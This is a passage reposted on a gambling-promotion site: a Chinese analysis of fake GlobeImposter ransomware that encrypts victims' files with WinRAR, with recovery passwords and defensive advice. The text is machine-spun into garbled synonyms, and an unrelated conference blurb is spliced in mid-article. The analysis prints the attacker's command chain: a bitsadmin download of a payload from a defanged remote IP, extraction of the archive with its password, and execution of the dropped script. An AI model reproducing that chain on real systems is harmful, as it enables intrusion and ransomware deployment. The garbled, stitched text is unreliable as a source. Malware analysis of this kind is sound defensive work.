WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

申博_安全工具 申博 75次浏览 未收录 0个评论

近日,腾讯平安御见要挟情报中心发明冒充GlobeImposter讹诈病毒正在流传,进击者疑经由过程MS SQL爆破入侵效劳器,经由过程收集下载歹意剧本代码,继而实行加密和讹诈流程。

令人惊叹的是,这个所谓的“讹诈病毒”实行极为简朴,只是应用WinRAR加密紧缩用户文件,以后再将一封GlobeImposter的讹诈音讯邮件修正后吓唬用户,经由过程邮箱联络讨取报答。腾讯平安提示人人,如遇到此病毒,不要焦急着交纳赎金。该病毒加密紧缩的暗码明文写在病毒设置信息中,运用这个暗码解紧缩,文件就能够完整恢复。

剖析

被讹诈效劳器疑似被经由过程MSSQL爆破入侵胜利,以后实行以下相干命令行进一步下载实行歹意代码:

1)bitsadmin  /transfer n hxxp://47.92.55[.]239/s/jr26.rar C:/Progra~1/jr26.rar

2)C:\Windows\system32\cmd.exe /c C:\Progra~1\winrar\rar.exe e -pp.5p C:\Progra~1\jr26.rar

3)C:\Windows\system32\cmd.exe /c C:\Progra~1\jr26.cmd

jr26.rar为一个带暗码的紧缩包,暗码为p.5p

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

jr26.rar解压后可得到一个疑似乱码的剧本文件

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

16进制检察可发明貌似多了0xFF 0xFE 0x0D 0x0A,目测应当是以二进制情势写入的标志,致使文本类辨认东西没法检察

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

去掉0xFF 0xFE 0x0D 0x0A后尝试再次翻开,剧本内容已能够一般检察

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

检察剧本内容可知,重要目标为将指定范例的文件依据后缀分类,离别运用winrar举行加密紧缩(经由过程上图的命令行参数,我们看到加密暗码为lll.hc3t6b9s8kz5r26),文件将被紧缩至根目录下对应的差别文件名(邮箱.ch_文件后缀范例.随机数字tiger88818)包内,同时删除原始文件。

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

如下图[email protected]_bax.32419tiger88818包内,则被带暗码紧缩了一切bak范例的文件

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

 

同时,为了防备加密紧缩时,数据库文件被占用致使加密中断,病毒还会完毕大批的数据库效劳相干历程。

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

最奇葩的来了,加密文件完成后,病毒会经由过程长途下载一个讹诈申明文档

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

翻开申明文档,竟然是着名讹诈病毒GlobeImposter的修正版本,该病毒作者只是修正了联络邮箱。

「干货」2019嘶吼白帽子技术沙龙,技术分享(内含PPT)

应读者要求,带来“嘶吼2019白帽子技术沙龙”技术分享 议题一:《漏洞攻防:自动化与智能化》 演讲嘉宾:丁牛科技网安实验室张云涛博士 PPT:漏洞攻防:自动化与智能化 .pdf 议题二:正面向你繁华似锦,背面连接暗无天日 演讲嘉宾:赵云翔 PPT:正面向你繁花似锦,背面连接暗无天日.pdf 议题三:智能编排技术如何加速企业安全威胁响应 演讲嘉宾:雾帜智能 傅奎 PPT:智能编排技术如何加速企业安全威胁响应0629.pdf 议题三:BLE通信给IoT设备带来的安全隐患 演讲嘉宾:DC0086 成员 Light PPT:BLE通信给IoT设备带来的

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密


进一步视察病毒运用的url可发明进击者运用的多个文件,离别有讹诈申明文档(HOW_TO_BACK_YOUR_FILE*),讹诈剧本包(jr26.rar),正规的winrar紧缩模块(Rar.exe),猜想为扫描器相干模块包(带未知暗码的s.rar包),且病毒运用效劳布置在某着名云平台效劳器上。

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

腾讯平安提示人人,针对此病毒,能够没必要焦急交纳赎金,可尝试运用Winrar翻开根目录中的*tiger88818后缀文件,然后挑选运用暗码(lll.hc3t6b9s8kz5r26)解压到指定位置,即可恢复文件。

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

 

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

平安发起

企业用户:

1、只管封闭没必要要的端口,如:445、135,139等,对3389,5900等端口可举行白名单设置,只允许白名单内的IP衔接上岸;

2、只管封闭没必要要的文件同享,若有须要,请运用ACL和强暗码庇护来限定接见权限,禁用对同享文件夹的匿名接见;

3、采纳高强度的暗码,防止运用弱口令暗码,并按期替换暗码。发起效劳器暗码运用高强度且无规律暗码,而且强迫请求每一个效劳器运用差别暗码治理;

4、对没有互联需求的效劳器/工作站内部接见设置响应掌握,防止可连外网效劳器被进击后作为跳板进一步进击其他效劳器;

5、对重要文件和数据(数据库等数据)举行按期非当地备份;

6、教诲终端用户郑重下载生疏邮件附件,若非必要,应制止启用Office宏代码;

7、在终端/效劳器布置专业平安防护软件,Web效劳器可斟酌布置在腾讯云等具有专业平安防护才能的云效劳;

WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密

8、发起全网装置御点终端平安治理体系(https://s.tencent.com/product/yd/index.html)。御点终端平安治理体系具有终端杀毒统一管控、修复破绽统一管控,以及战略管控等全方位的平安治理功用,可协助企业治理者周全相识、治理企业内网平安状态、庇护企业平安。

个人用户:

1、启用腾讯电脑管家,勿随便翻开生疏邮件,封闭Office实行宏代码;

2、翻开电脑管家的文档守护者功用,应用磁盘冗余空间自动备份数据文档,纵然发生意外,数据也可未雨绸缪。

原文地点: https://www.4hou.com/system/18954.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明WinRAR加密紧缩假装GlobeImposter讹诈病毒 平安专家轻松解密
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址